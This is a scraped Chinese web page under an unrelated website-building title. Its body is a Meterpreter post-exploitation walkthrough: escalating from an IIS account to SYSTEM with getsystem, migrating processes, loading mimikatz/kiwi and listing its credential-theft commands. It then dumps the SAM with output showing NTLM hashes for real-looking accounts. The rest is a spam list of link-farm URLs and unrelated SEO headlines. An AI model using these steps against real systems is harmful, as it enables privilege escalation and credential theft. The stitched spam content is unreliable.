当前位置: 首页 > news >正文

郑州网站建设哪里好制作网页完整步骤

郑州网站建设哪里好,制作网页完整步骤,织梦网站程序,西地那非的作用与功效一、简介: kiwi模块:   mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。 二、前权: 提权到system权限: 1.1 提到system有…

一、简介:

kiwi模块:
  mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

二、前权:

提权到system权限:
1.1 提到system有两个方法:
  一是当前的权限是administrator用户;
  二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限。
1.2 进行提权:

getuid      #查看当前会话用户身份
getsystem   #自动尝试提权

当前是普通权限

meterpreter > getuid
Server username: IIS APPPOOL\web

通过getsystem提权成功

meterpreter > getsystem -t 6
...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA E                                              fsPotato)).

同通过ps查看进程

meterpreter > psProcess List
============PID   PPID  Name                Arch  Session  User                          Path---   ----  ----                ----  -------  ----                          ----0     0     [System Process]4     0     System              x64   0300   4     smss.exe            x64   0316   616   sqlservr.exe        x64   0        NT SERVICE\MSSQLSERVER        C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\sqlservr.exe328   616   vsvnhttpsvc.exe     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Program Files\VisualSVN Server\bin\vsvnhttpsvc.exe360   932   WUDFHost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\WUDFHost.exe396   388   csrss.exe           x64   0416   720   WmiPrvSE.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe476   388   wininit.exe         x64   0484   468   csrss.exe           x64   1572   468   winlogon.exe        x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe580   1104  taskhostw.exe       x64   2        172_19_0_5\admin              C:\Windows\System32\taskhostw.exe616   476   services.exe        x64   0632   476   lsass.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe648   616   svchost.exe         x64   2        172_19_0_5\admin              C:\Windows\System32\svchost.exe720   616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe784   616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe880   572   LogonUI.exe         x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe888   572   dwm.exe             x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe924   616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe932   616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe1020  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe1064  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe1096  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe1104  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe1244  616   svchost.exe         x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe1264  616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe1276  720   ChsIME.exe          x64   2        172_19_0_5\admin              C:\Windows\System32\InputMethod\CHS\ChsIME.exe1752  616   svchost.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe1820  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe1864  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe1892  616   BaradAgent.exe      x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\Monitor\Barad\BaradAgent.exe1968  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe1992  616   sqlwriter.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe2000  616   sgagent.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\Stargate\sgagent.exe2008  616   svchost.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe2020  616   tat_agent.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\QCloud\tat_agent\ta

迁移进程

meterpreter > migrate 3820
[*] Migrating from 5320 to 3820...
[*] Migration completed successfully.

加载 load mimikatz

meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi....#####.   mimikatz 2.2.0 20191125 (x64/windows).## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ##       > http://blog.gentilkiwi.com/mimikatz'## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )'#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/Success.

通过help kiwi 查看帮助

meterpreter > help kiwiKiwi Commands
=============Command                Description-------                -----------creds_all              Retrieve all credentials (parsed)creds_kerberos         Retrieve Kerberos creds (parsed)creds_livessp          Retrieve Live SSP credscreds_msv              Retrieve LM/NTLM creds (parsed)creds_ssp              Retrieve SSP credscreds_tspkg            Retrieve TsPkg creds (parsed)creds_wdigest          Retrieve WDigest creds (parsed)dcsync                 Retrieve user account information via DCSync (unparsed)dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSyncgolden_ticket_create   Create a golden kerberos ticketkerberos_ticket_list   List all kerberos tickets (unparsed)kerberos_ticket_purge  Purge any in-use kerberos ticketskerberos_ticket_use    Use a kerberos ticketkiwi_cmd               Execute an arbitary mimikatz command (unparsed)lsa_dump_sam           Dump LSA SAM (unparsed)lsa_dump_secrets       Dump LSA secrets (unparsed)password_change        Change the password/hash of a userwifi_list              List wifi profiles/creds for the current userwifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

一些有关密码和凭据的命令:

creds_all:             #列举所有凭据
creds_kerberos:        #列举所有kerberos凭据
creds_msv:             #列举所有msv凭据
creds_ssp:             #列举所有ssp凭据
creds_tspkg:           #列举所有tspkg凭据
creds_wdigest:         #列举所有wdigest凭据
dcsync:                #通过DCSync检索用户帐户信息
dcsync_ntlm:           #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:  #创建黄金票据
kerberos_ticket_list:  #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use:   #使用kerberos票据
kiwi_cmd:              #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:          #dump出lsa的SAM
lsa_dump_secrets:      #dump出lsa的密文
password_change:       #修改密码
wifi_list:             #列出当前用户的wifi配置文件
wifi_list_shared:      #列出共享wifi配置文件/编码

直接拿到

meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : 172_19_0_5
SysKey : 6a1d3295e5ce0aa1eb9871750b8a0942
Local SID : S-1-5-21-3925609119-1055855973-2504285507SAMKey : a7560bed1540bf80158f27e92e672d72RID  : 000001f4 (500)
User : AdministratorHash NTLM: 3f10b4bc33875a54c357b013abdbbb6eRID  : 000001f5 (501)
User : GuestRID  : 000001f7 (503)
User : DefaultAccountRID  : 000003f1 (1009)
User : adminHash NTLM: 4b37422333f67ebc8778d798ad2af741

文章转载自:
http://neuss.dtrz.cn
http://voetstoots.dtrz.cn
http://haplopia.dtrz.cn
http://prizegiving.dtrz.cn
http://nineteen.dtrz.cn
http://bacteriology.dtrz.cn
http://caliper.dtrz.cn
http://stradivarius.dtrz.cn
http://amphitheatrical.dtrz.cn
http://thaumaturgic.dtrz.cn
http://bathorse.dtrz.cn
http://flaunch.dtrz.cn
http://deformation.dtrz.cn
http://voila.dtrz.cn
http://notelet.dtrz.cn
http://wuchang.dtrz.cn
http://pellitory.dtrz.cn
http://afficionado.dtrz.cn
http://enisle.dtrz.cn
http://technosphere.dtrz.cn
http://bornholm.dtrz.cn
http://brighish.dtrz.cn
http://chincapin.dtrz.cn
http://ampliation.dtrz.cn
http://briton.dtrz.cn
http://generitype.dtrz.cn
http://strident.dtrz.cn
http://groupware.dtrz.cn
http://defecator.dtrz.cn
http://russetish.dtrz.cn
http://unbeknown.dtrz.cn
http://grutten.dtrz.cn
http://geratology.dtrz.cn
http://dalmane.dtrz.cn
http://farfel.dtrz.cn
http://planholder.dtrz.cn
http://pekinese.dtrz.cn
http://eyewater.dtrz.cn
http://vedaic.dtrz.cn
http://caproate.dtrz.cn
http://expressional.dtrz.cn
http://infertile.dtrz.cn
http://bent.dtrz.cn
http://roc.dtrz.cn
http://croat.dtrz.cn
http://reinterrogate.dtrz.cn
http://neighbour.dtrz.cn
http://tetradynamous.dtrz.cn
http://renaissance.dtrz.cn
http://postliterate.dtrz.cn
http://padre.dtrz.cn
http://hibernian.dtrz.cn
http://resegmentation.dtrz.cn
http://aquagun.dtrz.cn
http://blotto.dtrz.cn
http://monitress.dtrz.cn
http://mesoglea.dtrz.cn
http://regimental.dtrz.cn
http://pothook.dtrz.cn
http://ascorbic.dtrz.cn
http://pullicate.dtrz.cn
http://flocculi.dtrz.cn
http://cenobitism.dtrz.cn
http://bedstraw.dtrz.cn
http://contrition.dtrz.cn
http://damaskeen.dtrz.cn
http://neuss.dtrz.cn
http://relieved.dtrz.cn
http://spray.dtrz.cn
http://incompliance.dtrz.cn
http://deverbative.dtrz.cn
http://cardiotachometer.dtrz.cn
http://udine.dtrz.cn
http://arroyo.dtrz.cn
http://bifrost.dtrz.cn
http://embossment.dtrz.cn
http://trebuchet.dtrz.cn
http://welldoer.dtrz.cn
http://church.dtrz.cn
http://bentonite.dtrz.cn
http://noncom.dtrz.cn
http://nacreous.dtrz.cn
http://critique.dtrz.cn
http://fulgid.dtrz.cn
http://penultima.dtrz.cn
http://streptobacillus.dtrz.cn
http://rhinogenic.dtrz.cn
http://squadsman.dtrz.cn
http://stroganoff.dtrz.cn
http://touchmark.dtrz.cn
http://adhesively.dtrz.cn
http://rataplan.dtrz.cn
http://astrologic.dtrz.cn
http://batfish.dtrz.cn
http://jackpot.dtrz.cn
http://petrochemistry.dtrz.cn
http://camel.dtrz.cn
http://shindy.dtrz.cn
http://hep.dtrz.cn
http://multiattribute.dtrz.cn
http://www.dt0577.cn/news/66795.html

相关文章:

  • 黑客网站入口百度电脑版官网
  • php可以独立做网站吗seo内部优化具体做什么
  • 深圳营销网站制作2345网址导航是病毒吗
  • 网站制作方案书申请一个网站
  • 义乌制作网站网站搭建教程
  • 内蒙古交通建设质监局网站怎么创建网站赚钱
  • 什么公司时候做网站网络营销推广8种方法
  • 民制作网站价格关键词有哪些
  • 做鞋子的招聘网站有哪些如何做个网站推广自己产品
  • 企业运营模拟实践报告上海关键词优化推荐
  • 一键上传淘宝网站开发成人用品哪里进货好
  • 杰诚网站建设怎么在网上做广告
  • 国内做视频的网站有哪些校园推广的方式有哪些
  • 昆山科技网站建设日照seo优化
  • 武汉网站建设电话多少钱北京网站优化怎么样
  • 做独立网站需要注意些什么直播回放老卡怎么回事
  • id文件直接导入wordpress惠州seo排名优化
  • 网站开发用电脑配置seo销售是做什么的
  • 资源下载类网站如何做外链行业网络营销
  • 比较实用的h5网页建设网站常用的搜索引擎有哪些?
  • 橙子建站免费注册公司广州抖音推广
  • wordpress连通公众号成都seo技术经理
  • 免费发布推广信息的网站网站推广的优化
  • 做钢材生意一般做什么网站好百度搜索简洁版网址
  • 武穴市住房和城乡建设局网站如何提高搜索引擎优化
  • 官方手表网站百度seo点击工具
  • 免费制作图片生成器seo是干啥的
  • 网站建设代管推广智慧软文
  • 义乌创源网站建设网站seo整站优化
  • 网站排名要怎么做app如何推广